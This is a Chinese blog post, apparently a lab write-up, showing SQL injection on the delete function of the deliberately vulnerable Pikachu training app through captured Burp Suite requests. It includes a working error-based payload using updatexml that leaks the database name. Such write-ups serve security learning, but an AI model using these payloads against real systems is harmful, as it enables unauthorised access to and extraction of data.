pikachu sql inject delete 注入
留言板输入几条信息
出现删除按钮,点他
通过burpsuite拦截请求,请求报文如下
GET /vul/sqli/sqli_del.php?id=57 HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
推测id=57处可能存在注入点,发送给repeater;并修改报文
57后面加一个',点击send,返回报文果然印证了猜测
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
那么这里就是一个注入点
57 后面加一段
or updatexml(1, concat(0x7e, database()), 0)
右键选中id对应的value,选择Convert selection ,选择url ,选择 Url-encode key character; 将选中的文字urlencode
GET /vul/sqli/sqli_del.php?id=57+or+updatexml(1,+concat(0x7e,+database()),+0) HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
可以看出空格都替换成了+
点击发送后,同样的(也是利用Xpath不认识~的原理)爆出了数据库名称
XPATH syntax error: '~pikachu'
本文作者:明月照江江
本文链接:https://www.cnblogs.com/gradyblog/p/16839039.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
分类:
标签:
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步